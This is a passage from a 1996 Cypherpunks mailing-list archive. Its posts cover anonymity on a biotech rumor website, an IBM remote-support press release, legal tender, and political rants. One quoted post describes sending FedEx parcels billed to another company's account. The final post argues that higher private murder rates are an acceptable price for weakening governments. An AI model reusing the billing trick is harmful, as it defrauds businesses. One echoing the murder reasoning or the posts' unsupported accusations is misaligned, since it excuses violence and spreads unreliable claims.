List, and there's just nothing we can do about it. We > just can't have our corporate image linked to persons on the SPL. Now, Joe, > you'll get a generous 6 weeks of severance pay, and Daphne will assist you > with your outplacement processing. Of course, Joe, you will have to go > through an inspection every morning until you're fully processed...there's > that SPL matter, you know." > JS: "Uh..." In this case I wouldn't bother with Mr. Bell's solution. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From dlv at bwalk.dm.com Tue Sep 10 00:05:37 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 10 Sep 1996 15:05:37 +0800 Subject: [WAS xs4all.nl] Terrorists In-Reply-To: <2.2.32.19960909182912.008bf55c@panix.com> Message-ID: Duncan Frissell writes: > And I support a terrorist organization (the US Government) every year > whether I want to or not. The US was convicted of a major violation of > international law (akin to terrorism) in the International Court of Justice > back in the '80s for air sowing mines in Nicaragua's main harbor. The U.S. committed heinous war crimes (on par with Nazi Germany) in Korea, Viet Nam, Nicaragua, Panama, Grenada, Iraq, and many other countries. President Clinton is a bloodthirsty terrorist, guilty of murder, high treason, and other capital crimes. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From tcmay at got.net Tue Sep 10 00:07:02 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 10 Sep 1996 15:07:02 +0800 Subject: Satellite Bowel Movement? Message-ID: At 3:12 AM 9/9/96, Blak Dayz wrote: > I was out buying groceries and after they scanned the shit through they >told me that all the ATMs in the City were out due to connection problems. So i >go home and start trying to scan for the shits and i cant find them. If anyone >knows what the hell happened i would appreciate the details. I believe it may >have been a solar flare that caused the companies to redirect their satellites. >It would do me alot of help considering i had to pay CASH (i hate paper) >for the >stuff and i would like to complain to the fucking JPL and satt. operators about >them warning the public. I agree. In times like this, they should be warning the public! The overload was caused by Zeta Reticulans draining more power from the grid than had been planned by the Ruling Council. Clinton dispatched _three_ of his Black Helicopters to Area 51, and they kicked some alien butt. I think the Morks will be more malleable. We on the Doom13/D&D/Cypherpunks list are wise to their wayz, and their warez, and will issue aluminum foil helmets to all those in danger. Latr, d00d! --Zarkon From 102540.2453 at CompuServe.COM Tue Sep 10 00:34:46 1996 From: 102540.2453 at CompuServe.COM (Blak Dayz) Date: Tue, 10 Sep 1996 15:34:46 +0800 Subject: Satellite Movement? Message-ID: <960909031224_102540.2453_HHV82-1@CompuServe.COM> I was out buying groceries and after they scanned the shit through they told me that all the ATMs in the City were out due to connection problems. So i go home and start trying to scan for the shits and i cant find them. If anyone knows what the hell happened i would appreciate the details. I believe it may have been a solar flare that caused the companies to redirect their satellites. It would do me alot of help considering i had to pay CASH (i hate paper) for the stuff and i would like to complain to the fucking JPL and satt. operators about them warning the public. From dlv at bwalk.dm.com Tue Sep 10 00:38:25 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 10 Sep 1996 15:38:25 +0800 Subject: Anonymity thread from sci.research.careers Message-ID: Recently I noticed an interesting thread on the Usenet newsgroup s.c.r regarding a Web site with a conferencing system, supposedly anonymous. I repost several articles which some folks on cp might find interesting. Path: !howland.erols.net!news2.digex.net!access1.digex.net!arthures From: "Arthur E. Sowers" Newsgroups: sci.research.careers Subject: Review and Warning about the "Biotech Rumor Mill" Date: Mon, 2 Sep 1996 22:16:39 -0400 Organization: Express Access Online Communications, USA Lines: 114 Message-ID: References: NNTP-Posting-Host: access1.digex.net Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Sender: arthures at access1.digex.net In-Reply-To: Folks, I decided to visit this web site and tell all of you a few things you ought to keep in mind. First, the review: Yes, the "Rumor Mill" is a sort-of web-site "newsgroup". The majority of posts and responses that I saw (not counting the archives) were by "anonymous" posters. A good many were not particularly "hot" (such as "why is company 'X' stock dropping?" and some inane comments). Some were cryptic (meaning to the average person, they might be essentially meaningless). Most were very short (1-2 sentences). A few posts did have some information that I downloaded for use later. One or two mentioned lawsuits (patent infringement). Second, the warning: The Rumor Mill lets you post anonymously (as far as I could see, but I did not try it) but THAT DOES NOT MEAN THAT SOMEONE WILL NOT KNOW WHO YOU ARE. I don't know how the Rumor Mill is operated, but I do know that websites CAN be configured to capture information about browser users who access that site! They can get a large amount of information about you including your name, email address, all sorts of information about your domain & ISP, etc. Your anonymous post may appear to everyone else as anonymous, but the sysop (webmaster) at that site should be presumed to be capable of determining who you are. I myself have seen website "hit statistics" and believe me, it all shows up. You should look in your Web Browser directory for the file and note that some web sites that you visit will put short lines of data into your file. You might try to change the attributes on that file to "read only" and see what happens. Sometimes it will thwart the web site, sometimes it will give you an error message. As a matter of fact, I did click on one button and my netscape security window opened up to warn me that the channel to that site was not secure. What else is related to this? There are a number of anonymous remailers out in cyberspace, but it has been stated by a knowledgeable source that a number of them are being operated by law enforcement agencies (presumably to troll for criminal activity). A website which allows rumors to be posted anonymously, especially involving commercial business details (i.e. proprietary) but carries at least no disclaimer that the sysop or sponsors do not use hit statistics data to correlate it with anonymous posters and thereby determine or attempt to determine thier identity is a website that I would avoid using. In the worlds of politics, leaks, trial-baloons, rumor, inuendo, insinuations, etc. are common and make for entertaining reading for those who enjoy it. But in the world of commerce, the wrong blip in the wrong place can lead to lawsuits, prosecution (by, for example, the Securities and Exhange Commission), and other personal information, identity, etc., to fall into hands that I would hope smart people might think about before they make posts. I have the feeling that a simple post to a newsgroup through a remailer would be safer that an anonymous post to the Rumor Mill. At least, I would get into the configuration dialog boxes on your web browser and leave "your name" and "your email address" blank, or put in a dummy name. But then, you can figure out that this is a way to also send forged mail (there was a "fake mail" website about a year or two ago, but the sysops eventually shut it down). There is in fact a website out there that says it can be used for anonymous web browsing (and I expect at some time in the future that they will start charging for its use [think for a minute why these would exist and it will be obvious]), but where I have that little snit of paper is burried on my desk with mountains of uncolated paperwork (sorry). What dothey say about "buyer beware?" Caveat emptor? Eh? Art Sowers ======= On 29 Aug 1996, Linda St. James wrote: > Do you want to have a little fun and perhaps learn something about the > current state of the biotechnology industry? > > Have you a particular company you've been interested in that you'd like > more information on -- but the "inside scoop" seems better than an > official company profile? > > IF SO --- > > > Please take a look at Dr. Martin Leach's BIOTECH RUMOR MILL, one of the > most fascinating sites on the WWW for the biotechnologist. > > In this site, Martin goes to great lengths to have an "all in one > location" center for biotechnology news. Whether it is the daily reports > from PR Newswire, or his reader surveys, you are bound to find something > of interest. But, to prove that the internet imitates real life, some of > the most interesting tidbits are pure rumor. > > In this site, you and your colleagues have an opportunity to post > information in a completely anonymous fashion. Some of the biggest news in > the biotechnology business comes out of the "Rumor Mill" before it hits > the trade journals, or even the Wall Street Journal! Of course, you have > to remember that in any forum where anyone can post anonymously, there is > a certain amount of frivolity as well. But what fun! > > Search Masters International, an industry-leading search firm specializing > in Biotechnology, Pharmaceuticals, and Medical Device industries, is now a > sponsor of this site along with Research Diagnostics. > > Take a look at your earliest convenience: > > The Biotech Rumor Mill is at: http://www.tradesmart.com/rumor > > The Search Masters International home page is at: http://smi.bio.com/ > > Best regards, > > Linda St. James, Office Manager > Search Masters International > Five Hundred Foothills South, Suite #2 > Sedona, AZ 86336 > (520) 282-3553 Phone or (520) 282-5881 Fax > email to lindasj at sedona.net > > Path: !howland.erols.net!news2.digex.net!access5.digex.net!arthures From: "Arthur E. Sowers" Newsgroups: sci.research.careers Subject: Re: Review and Warning about the "Biotech Rumor Mill" Date: Tue, 3 Sep 1996 13:59:21 -0400 Organization: Express Access Online Communications, USA Lines: 89 Message-ID: References: NNTP-Posting-Host: access5.digex.net Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Sender: arthures at access5.digex.net In-Reply-To: On 3 Sep 1996, Dave Jensen wrote: > In article , > "Arthur E. Sowers" wrote: "Nice" of you to delete ALL of my post instead of dealing with the specific issues, or CONSIDERING that I might have some valid points. > > Art you have gone off the deep end. > > Yes, let's now add web site reviews and critiques to your mix of strange > posts. Personally, I think you miss the whole point of Martin's rumor mill > site, and it is obvious that you didn't read the webmaster's introduction > of how he handles anonymity. I returned to that website a few minutes ago to look over "how he handles anonymity" and nothing in what he said negates the possibility that he (and, by extension, can share "inteligence" information about the source of the rumor and maybe even the identity of the poster). You can have him look at his web hit statistics and he will find my "visit" listed (or at least he should be able to find it, as I did not go to the site "cloaked"). As a matter of fact, the wording of the disclaimers (at .../rumor/post.html) is that "All correspondees identities will be kept confidential." which says to me that he (and you?) may "keep" them confidential (i.e. you may know them, even though you may not broadcast them all over the net, and that may give you some valuable insight into who says what and when). He says at another point "..., an email is sent directly to me and a message is appended to the Rumor Mill." As far as I am concerned, if you go over to the anonymous newsgroups and read about privacy (and get the help file from Julf Helsigius' anon remailer) ANY sysop can read any mail that comes through a sysop's site. And, if I were in a private business, I would see the temptation to "use" that information being just as strong as governments all over the world justify having their own CIAs, NSAs, KGBs, etc., and just as strong as many corporations have their own "intelligence" activities, reverse engineering departments, and private security and investigation units. If you go to any good sized public library and look up under industrial espionage and spying, you will get many books on this. You can try to pull the wool over most of the eyes around here, but it ain't gonna work with me. You would also be advised to work with Martin to rephrase some of his language. He says at another point in a page that "This site is for entertainment purposes only." Hell, thats crap. If I go looking for such gossip and rumors, its because it deals with something that impacts on my life, my job, my career and it better be good poop! Besides, on the esthetics, virtually every (EVERY) post that I clicked on had this overly obvious "Proudly Sponsored by -- SMI" box plastered right on the top. Then right under it is the RDI box. Man, can't you guys show a little "class" and just have this showing just once on the home page and cut out all the repetition? It turns me off. And, you should have thanked me for NOT mentioning all the posts that are now archived that reported problems hitting your SMI site (I didn't read more than one or two of them). > Stick to what you know, Art, which appears to me to be academic career > tracks. No one has ever disputed your commentary in that area. But, like > the restaurant reviewer who thinks he now knows enough about entertainment > to review opera, you have gone over the edge and into territory better > left for those who, like Dr. Martin Leach, really know how to provide > value on the WWW. Your opinion, as usual. But for the rest of you out there, think twice about posting an "anonymous" message to a web site. I've been on the other end of them, and I know that people sit around trying to figure out as much as possible about who its from if they don't get an email identity. Or... how, Dave, would you like it if I tried to go in and put a warning to visitors to that site? Would you and or Martin "censor" my post? After all, at another place on the website is the statement that "I am not responsible for the accuracy of this information although I try to confirm where possible." I know that many "service providers" openly state that they reserve the right to decline or terminate service to any subscriber for any reason at any time. Martin could be in a little "free speech" trouble and you and he might get together (since you are sponsoring, too, and therefore "calling the tune") and talk about this. I should send you a bill for consulting time on this, actually. > > Dave > > Art Sowers Path: !howland.erols.net!news2.digex.net!access2.digex.net!arthures From: "Arthur E. Sowers" Newsgroups: sci.research.careers Subject: Re: Review and Warning about the "Biotech Rumor Mill" Date: Wed, 4 Sep 1996 22:03:34 -0400 Organization: Express Access Online Communications, USA Lines: 118 Message-ID: References: <50i2rr$t6i at news.bu.edu> NNTP-Posting-Host: access2.digex.net Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Sender: arthures at access2.digex.net In-Reply-To: On Wed, 4 Sep 1996 mmartin at BIOMED.MED.YALE.EDU wrote: > About the Biotech Rumor Mill - I think it is a very cool idea. Really, I > do. I have some doubts about the duplicity of the statement *for > entertainment purposes only* but I can live with it. (It just sounds a bit > too much like those ads on late-night TV for psychics; most of the ad is > full of testamonials about how the service accurately predicted things and > how it helps people by predicting events but if you look closely there is > a small disclaimer that says *for entertainment purposes only*. Yeah, > right. But Martin Leach isn't charging for access, so I can live with it.) > > On 3 Sep 1996, Martin Leach wrote: > > > Hi Arthur, > > > > I read your initial comments to Dr. Jensen and feel that are being a little > > paranoid. > > To each his own. Just because you are paranoid > doesn't mean they aren't out to get you (or so the saying goes). ha, ha. > > > Information can be readily collected by any adept webmaster that wishes > > to.....so your comments are applicable to EVERY web site. > > Can't argue with that. But, of course, that isn't the point. The point is > that your site (unlike the vast majority of sites) claims to protect > anonymity. If you claim to protect anonymity, then your site should be > held to different standards. > > > Just because > > somebody clicks 'submit' on a form e.g. posting form on my site it does not > > send any extra information that cannot be gathered any other nefarious way. > > I don't think Art was suggesting anything of the sort (Art, feel free to > correct me if I'm wrong). I think he was just pointing out that it is > possible to gather a lot of information about a poster - information that > the poster may not be aware that he/she is giving. People (even > scientists!) are generally unaware about how insecure electronic > transmissions are and I think Art was just trying to raise the level of > awareness. Yep, that is what I had in mind. The anonymous posts may be anonymous to everyone else, but the "masters" at that site have it in their power to know where the post came from and who authored it and that could give them some interesting information to be privy to. Julf Helsingius who used to run the anon.penet remailer was a lot more honest about security and was very upfront about this in his "help" responder. But his site is off the air now. I could make lots of speculations but I won't. But everyone should beware of anything which is offered for "free" by business entities. Sometimes its a PR thing. Sometimes its genuine altruism. And sometimes its a pure scame. I won't openly estimate here how I would partition the fractions between those three possibilities. However, if I were running the "Rumor Mill" I would have a lot more extensive of a disclaimer and explanation (not only for PR but for legal purposes...I would not want to be a party in a lawsuit to "leaked" proprietary information... there is a fair bit of case law on this now). > The reason your site has become a lightning rod for security/privacy > issues is that you claim to protect anonymity. This discussion could be > about any website, but it only seems relevant when a website claims to > protect anonymity. I don't think it was meant to suggest that you (or > anyone who has priveleged access to the site) would actually abuse the > contract of anonymity, but of course you can't warn people about > potential abuse without it looking like you think it is likely that > people will abuse priveleges. (hope that convoluted sentence makes sense) I know what you mean, and if those guys are smart, they will think about this a little. > Anyway, if I had something that could get me fired, sued, or blackballed, > I sure wouldn't want to trust someone's claim of anonymity - especially > since that claim is probably not legally enforcable (i.e., I couldn't sue > the webmaster for damages if s/he made my identity known). Well, the anon.penet service got the local Finnish authorities (i.e. the heat) on their rear ends and that caused the whole service to terminate. The FBI, here, has been known to just go in and confiscate the hardware and software if they want to shut someone down for good cause. Suppose you were a company that didn't like something. Money and lawyers can lead to actions to stop something. I recall a year or two ago that one of the tobbacco companies didn't like the results of a researcher which got published and came out as anti-tobbacco. What did the company do? They used legal manuvering to force the researcher to turn over all of his notes, data, notebooks, manuscript drafts to the tobbacco company. How do you like them apples? By the way, this was reported in an issue of _Science_ back maybe 2 (?) years ago. > This is even > more important if that someone is intimately tied to the industry about > which I have information! I'd be much more likely to send it through an > anonymous remailer (even though those are no longer secure). I'd go for plain paper, handled with gloves that had not been touched on the outside by any of my pinkies, in an envelope, addressed and stamped (without licking), to the Wash Post, NY Times, and FBI, if I had something to blow the whistle about. You know, like in the spy novels written by ex-spooks. > Call me paranoid, if you will. But I sure as heck won't go walking in > downtown at night with $20 bills taped all over me - I'd just be asking > to get robbed, wouldn't I? I don't see that this is any different (except > in degree, perhaps). Right-on! > > Margaret A. Martin > > Yale University > mmartin at biomed.med.yale.edu > > > Art Sowers Path: !magnus.acs.ohio-state.edu!lerc.nasa.gov!purdue!news.bu.edu!darwin!leach From: leach at darwin (Martin Leach) Newsgroups: sci.research.careers Subject: Re: Review and Warning about the "Biotech Rumor Mill" Date: 3 Sep 1996 20:02:03 GMT Organization: Boston University Lines: 163 Message-ID: <50i2rr$t6i at news.bu.edu> References: NNTP-Posting-Host: darwin.bu.edu X-Newsreader: TIN [version 1.2 PL2] Hi Arthur, I read your initial comments to Dr. Jensen and feel that are being a little paranoid. Information can be readily collected by any adept webmaster that wishes to.....so your comments are applicable to EVERY web site. Just because somebody clicks 'submit' on a form e.g. posting form on my site it does not send any extra information that cannot be gathered any other nefarious way. The only additional information they send is whatever they fill in the dialog boxes. an example of info-gathering that can be acheived by any webmaster can be found at: http://www.uiuc.edu/cgi-bin/info together with the web browser + privacy issue. The only information that I have the need to collect is the I.P. (internet protocol) address of the postee. The purpose of this being that I can prevent them posting to my site if they repeatedly post off-topic or abusive posts. In the past I have used this to prevent stock touting on my website and have banned whole sub-domains. (since the i.p. address may be general to the sw region of ATT or AOL). This is all mentioned on the top of the post page (http://www.tradesmart.com/rumor/post.html) that people have to scroll through to get to the posting section. Other information that is automatically collected (by the web server) is the domain name/I.P. address of the people visiting the web site. This allows me to see who (in a very general sense) access my web site. This information is freely available to anyone visiting my website...and I frequently advertise this fact. You can obtain your own copy of the traffic report at this web site by going to: http://www.tradesmart.com/cgi-bin/surfreport.html just fill in your email address and wait. The results will be emailed to you. You do not need to wait for the reply..since the stats processing takes time. good luck on your endeavours and feel free to post something on the Rumor Mill. Whether anonymous or pubicly. Martin Leach Webmaster of the Biotech Rumor Mill. Arthur E. Sowers (arthures at access.digex.net) wrote: : Folks, I decided to visit this web site and tell all of you a few things : you ought to keep in mind. : First, the review: Yes, the "Rumor Mill" is a sort-of web-site : "newsgroup". The majority of posts and responses that I saw (not counting : the archives) were by "anonymous" posters. A good many were not : particularly "hot" (such as "why is company 'X' stock dropping?" and some : inane comments). Some were cryptic (meaning to the average person, they : might be essentially meaningless). Most were very short (1-2 sentences). A : few posts did have some information that I downloaded for use later. One : or two mentioned lawsuits (patent infringement). : Second, the warning: The Rumor Mill lets you post anonymously (as far as I : could see, but I did not try it) but THAT DOES NOT MEAN THAT SOMEONE WILL : NOT KNOW WHO YOU ARE. I don't know how the Rumor Mill is operated, but I : do know that websites CAN be configured to capture information about : browser users who access that site! They can get a large amount of : information about you including your name, email address, all sorts of : information about your domain & ISP, etc. Your anonymous post may appear : to everyone else as anonymous, but the sysop (webmaster) at that site : should be presumed to be capable of determining who you are. I myself have : seen website "hit statistics" and believe me, it all shows up. You should : look in your Web Browser directory for the file and note : that some web sites that you visit will put short lines of data into your : file. You might try to change the attributes on that file to "read only" : and see what happens. Sometimes it will thwart the web site, sometimes it : will give you an error message. As a matter of fact, I did click on one : button and my netscape security window opened up to warn me that the : channel to that site was not secure. What else is related to this? There : are a number of anonymous remailers out in cyberspace, but it has been : stated by a knowledgeable source that a number of them are being operated : by law enforcement agencies (presumably to troll for criminal activity). A : website which allows rumors to be posted anonymously, especially involving : commercial business details (i.e. proprietary) but carries at least : no disclaimer that the sysop or sponsors do not use hit statistics data : to correlate it with anonymous posters and thereby determine or attempt to : determine thier identity is a website that I would avoid using. In the : worlds of politics, leaks, trial-baloons, rumor, inuendo, insinuations, : etc. are common and make for entertaining reading for those who enjoy it. : But in the world of commerce, the wrong blip in the wrong place can lead : to lawsuits, prosecution (by, for example, the Securities and Exhange : Commission), and other personal information, identity, etc., to fall into : hands that I would hope smart people might think about before they make : posts. I have the feeling that a simple post to a newsgroup through a : remailer would be safer that an anonymous post to the Rumor Mill. At : least, I would get into the configuration dialog boxes on your web browser : and leave "your name" and "your email address" blank, or put in a dummy : name. But then, you can figure out that this is a way to also send forged : mail (there was a "fake mail" website about a year or two ago, but the : sysops eventually shut it down). There is in fact a website out there that : says it can be used for anonymous web browsing (and I expect at some time : in the future that they will start charging for its use [think for a : minute why these would exist and it will be obvious]), but where I have : that little snit of paper is burried on my desk with mountains of : uncolated paperwork (sorry). : What dothey say about "buyer beware?" Caveat emptor? : Eh? : Art Sowers : ======= : On 29 Aug 1996, Linda St. James wrote: : > Do you want to have a little fun and perhaps learn something about the : > current state of the biotechnology industry? : > : > Have you a particular company you've been interested in that you'd like : > more information on -- but the "inside scoop" seems better than an : > official company profile? : > : > IF SO --- : > : > : > Please take a look at Dr. Martin Leach's BIOTECH RUMOR MILL, one of the : > most fascinating sites on the WWW for the biotechnologist. : > : > In this site, Martin goes to great lengths to have an "all in one : > location" center for biotechnology news. Whether it is the daily reports : > from PR Newswire, or his reader surveys, you are bound to find something : > of interest. But, to prove that the internet imitates real life, some of : > the most interesting tidbits are pure rumor. : > : > In this site, you and your colleagues have an opportunity to post : > information in a completely anonymous fashion. Some of the biggest news in : > the biotechnology business comes out of the "Rumor Mill" before it hits : > the trade journals, or even the Wall Street Journal! Of course, you have : > to remember that in any forum where anyone can post anonymously, there is : > a certain amount of frivolity as well. But what fun! : > : > Search Masters International, an industry-leading search firm specializing : > in Biotechnology, Pharmaceuticals, and Medical Device industries, is now a : > sponsor of this site along with Research Diagnostics. : > : > Take a look at your earliest convenience: : > : > The Biotech Rumor Mill is at: http://www.tradesmart.com/rumor : > : > The Search Masters International home page is at: http://smi.bio.com/ : > : > Best regards, : > : > Linda St. James, Office Manager : > Search Masters International : > Five Hundred Foothills South, Suite #2 : > Sedona, AZ 86336 : > (520) 282-3553 Phone or (520) 282-5881 Fax : > email to lindasj at sedona.net : > : > --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From wombat at mcfeely.bsfs.org Tue Sep 10 00:38:33 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Tue, 10 Sep 1996 15:38:33 +0800 Subject: Anonymous FedEx, was: What is the EFF doing exactly? In-Reply-To: Message-ID: On Mon, 9 Sep 1996, Steve Schear wrote: > >David Lesher wrote: > > >Try & mail an anonymous FedEx package. > I FedEx'd some packages w/ "rabid wombat" as the sender's name, and the local FedEx office's address as the return. The packages went through. International. Amazing. > Not a problem. You merely use the FedEx number of local company. Get > FedEx forms from an unmanned FedEx pick-up point, fill one in (using an > impact printer, if desired, to simulate the appearance of the pre-addressed > forms given to their regular customers), attach to parcel and drop it in > the box (no finger prints please). > > Works like a charm. > > > > PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 > --------------------------------------------------------------------- > Snoop Daty Data | Internet: azur at netcom.com > Grinder | Voice: 1-702-655-2877 > Sacred Cow Meat Co. | Fax: 1-702-658-2673 > 7075 W. Gowan Road, #2148 | > Las Vegas, NV 89129 | > --------------------------------------------------------------------- > > Just say NO to perscription DRUGS. > > > > From wombat at mcfeely.bsfs.org Tue Sep 10 00:39:40 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Tue, 10 Sep 1996 15:39:40 +0800 Subject: take the pledge In-Reply-To: <199609080352.VAA15611@InfoWest.COM> Message-ID: Better late than never, I suppose. :) - r.w. On Sun, 8 Sep 1996, attila wrote: > Alright! it's a genuine PerryGram! I'll take the pledge; > I've never been able to answer Sternlight without being > significantly more offensive than usual! > > attila > > -- > one of the few things we all share: > the utter, corrosive contempt for our elected officials. > > > -------------------------------------------------------- > > In, on 07/19/96 > at 12:06 PM, "Perry E. Metzger" said: > > =Subject: take the pledge > > > =Look, folks, we all know that 99% of what David Sternlight posts is > =garbage. Why don't we all pledge not to answer any of his posts, and > =then he'll go away. If necessary, someone can be appointed to post a > =weekly "the views expressed by David are junk and we are deliberately > =not replying to them directly" message. > > =David has plenty of places to argue with the wind. We don't need to > =add this one. > > =I'd like to ask people to publically pledge that they will not reply > =to David's messages. This is such a pledge. > > =Perry > > > > From jleonard at divcom.umop-ap.com Tue Sep 10 00:49:22 1996 From: jleonard at divcom.umop-ap.com (Jon Leonard) Date: Tue, 10 Sep 1996 15:49:22 +0800 Subject: Crypto Anachy MUD In-Reply-To: <2.2.32.19960909183805.008b9c70@panix.com> Message-ID: <9609100510.AA06806@divcom.umop-ap.com> Duncan Frissell wrote: > Did anyone make the point (I gave up on the thread) that we already have a > great Crypto Anarchy MUD with lots of the coding already done. We call it > the Internet. Digital cash, strong crypto, remailers, everything. Tim May expressed doubt that it was worth the effort: Not much easier than the real thing, and not as good. That's the closest to your point, I think. > I have never been able to figure out why anyone would want to play games on > a computer in any case when the whole system is a game. Word processing, > spreadsheets, telecoms -- it's all a game. And they pay you to play it. I've never figured out why anyone would play games at all -- the whole universe is all a game too. For whatever reason, some people (including me) like to play games. I've been working on a MUD anyway, and the question is whether it would be interesting enough to add crypto-anarchy aspects to it to be worth the effort. Obviously you think not. There are a few significant differences: We don't have fully anonymous digital cash, and not everyone can issue it. Strong crypto isn't universally deployed. Remailers don't allow easy two-way traffic. Few employers are willing to pay pseudonymous entites. You don't get imprisioned or killed for too-risky behavior on a MUD. Running a MUD invites less unwelcome attention than do some of the services discussed on cypherpunks. Finally, a MUD has the potential to spread crypto-anarchic ideas to people who would not otherwise have considered them. It may be that I'm wasting my time, but I could come up with some useful new crypto protocol too. > DCF Jon Leonard From Adamsc at io-online.com Tue Sep 10 00:52:09 1996 From: Adamsc at io-online.com (Adamsc) Date: Tue, 10 Sep 1996 15:52:09 +0800 Subject: FWD: remote help Message-ID: <19960910044954703.AAA197@IO-ONLINE.COM> This has the potential to be very useful. I do hope, however, that there are some safeguards against hackers. Just a "Allow access?" dialog would be a large deterrent. ==================BEGIN FORWARDED MESSAGE================== >Date: Mon, 9 Sep 1996 13:30:10 -0700 >Reply-To: OS/2 Users Discussion List >Sender: OS/2 Users Discussion List >From: James Ssemakula >Subject: FWD: remote help >X-To: os2-l at hearn.nic.surfnet.nl, os2users at vm1.mcgill.ca >To: Multiple recipients of list OS2USERS To: "os2news" Date: Wed, 04 Sep 96 12:49:35 -0500 Reply-To: "Terry Hamilton" Subject: OS2News: Remote Support Tool Featured In Merlin REMOTE SUPPORT TOOL FEATURED IN MERLIN WEST PALM BEACH, FLORIDA, September 3, 1996 --- International Software Solutions has announced that an IBM-only version of their product, Remote Services Management(TM) (R.S.M.) will be included in OS/2 Warp Version 4 (code-named Merlin). This innovative tool, called IBM Remote Support for OS/2, allows IBM service representatives to help users directly over the phone, much as an on-site Help Desk would. With the permission of the OS/2 user, a remote IBM service representative can now dial into the user's system, take control of the keyboard and screen, conduct training, run programs, edit files and, if necessary, reboot. IBM Remote Support for OS/2 is a functional subset of R.S.M., which was chosen by IBM from among several remote control tools. R.S.M. is a full function product allowing network support and administrative people to take control of client workstations. For the general user community, R.S.M. is used for help desk support, software installation and updating, training, and full access to an office computer from a remote laptop. Through an integrated Programming Script Language, R.S.M. can even be used to build complex LAN and WAN Management applications. R.S.M. was formerly known as PolyPM/2. According to Tim Guptill, Senior Vice President of International Software Solutions, USA, "We at I.S.S. are proud that we have been selected to provide IBM Remote Support for OS/2 for inclusion in the IBM Assistance Center - OS/2 Warp Version 4. Now, IBM Technical Support can directly access and control customer machines to perform Help Desk and diagnostic functions. This is a revolutionary step in providing a level of customer support as yet unavailable in the general software market". For more information on Remote Services Management, contact I.S.S. at their toll-free number (888) ISS-2-YOU, GO ISSLP on CompuServe (e-mail 104127,1754), or on the Web at http://www.iss2you.com. -0- 9/04/96 /CONTACT: Press: Christopher C. Canning, 888-ISS-2-YOU or 407-820-0802, ext. 210 or Fax: 407-820-0804 or CompuServe: 104127,1754/ ===================END FORWARDED MESSAGE=================== - "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said. * Home: Chris Adams | http://www.io-online.com/adamsc/adamsc.htp * Autoresponder: send email w/subject of "send resume" or "send PGPKEY" * Work: cadams at acucobol.com | V.M. (619)515-4894 | (619)689-6579 * Member in good standing of the GNU whirled hors d'oeuvre From tcmay at got.net Tue Sep 10 01:02:44 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 10 Sep 1996 16:02:44 +0800 Subject: All debtes public and private Message-ID: At 8:36 PM 9/9/96, jbugden at smtplink.alis.ca wrote: >This may be a hopelessly naive question, but is it possible to refuse >payment in >cash? Is it really good for all debts public and private? > There is probably a FAQ on this, as it gets asked and debated so often. >From my reading of too many posts on too many lists about this issue, here are some misc. points: * First, anyone may specify what form of payment they want to be paid in, in advance of a transaction. Alice may demand payment in gold, in platinum, in barrels of oil, or in Blatislavan Yarts. Bob is free to decline her terms. (A common example is a sign saying "No bills over $20 accepted." Thus, if Bob fills his gas tank and then says "Here's a thousand-dollar bill...I hope you have change," he cannot escape his debt simply because the gas station does not make change for $1000 bills. If there is no sign, and the $1K note is offered....well, I don't know what would happen. Maybe there's been a case like this... Certainly the debt is not discharged merely because the payment cannot be accepted at the time....) * Second, once a debt has been incurred--as when a restaurant meal has been consumed, a gas tank filled, etc.--and absent any special arrangements for the payment to be in some special form, the debt is considered discharged if payment in legal tender (dollars) is offered. That is, the debtor can offer dollars. If the merchant demands Blatislavan Yarts, the State will not consider the debtor in default for not paying in Yarts. (Again, absent a contractual agreement.) * Third, a merchant is free to not let a transaction go to completion at the point of sale (e.g., the cash register, for physical goods being purchased) if the form of payment is not acceptable to him. (The case of a gas tank already being filled, a restaurant meal already being eaten is more complicated, with an "implied contract" being involved. Absent signs or agreements clearly announced, the assumption is that dollars are the means of settlement.) * Fourth, the main reason for the "legal tender for all debts public and private" statement appears to be linked to efforts to stamp out private, bank-issued currencies. * Fifth, there are various books on alternative currencies, denationalization of money, and such issues. Basically, trying to introduce a new currency is not likely to be strongly supported by the legal system. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From jimbell at pacifier.com Tue Sep 10 01:31:17 1996 From: jimbell at pacifier.com (jim bell) Date: Tue, 10 Sep 1996 16:31:17 +0800 Subject: [WAS xs4all.nl] Terrorists Message-ID: <199609100549.WAA22794@mail.pacifier.com> At 02:29 PM 9/9/96 -0400, Duncan Frissell wrote: >At 01:49 AM 9/9/96 -0700, Timothy C. May wrote: >>And the net effect of crypto anarchy is to destabilize and marginalize >>central governments, which is a net positive effect. If some eggs get >>broken in the process, the biological imperative will generate more eggs. >>No big deal. > >Particularly since governments murdered 160 million in the last 100 years >while we civilians have only managed to murder a paltry 20 million or fewer. >A savings of 160 million deaths leaves a lot of room for a non-harmful >increase in private murder. We could increase the private murder rate by 8 >to 10 times and still break even. I think the analysis is even more attractive than these numbers would imply. Probably the victims of government were, on average, no more "worthy of death" than that of the average citizen. They were the soldiers killed in wars (many or most of whom were drafted), civilians bombed, the victims of oppression and holocaust, etc. More or less ordinary people, a cross-section of society. While it's harder to generalize about victims of private killing, probably a far higher probability were either the bad guys killed off by other bad guys, or the bad guys killed legitimately by the good guys. Even when they were "good guys killed by bad guys," in many cases it's due to fallout from drug laws, or people prevented from carrying guns for their own protection. >Note too that most 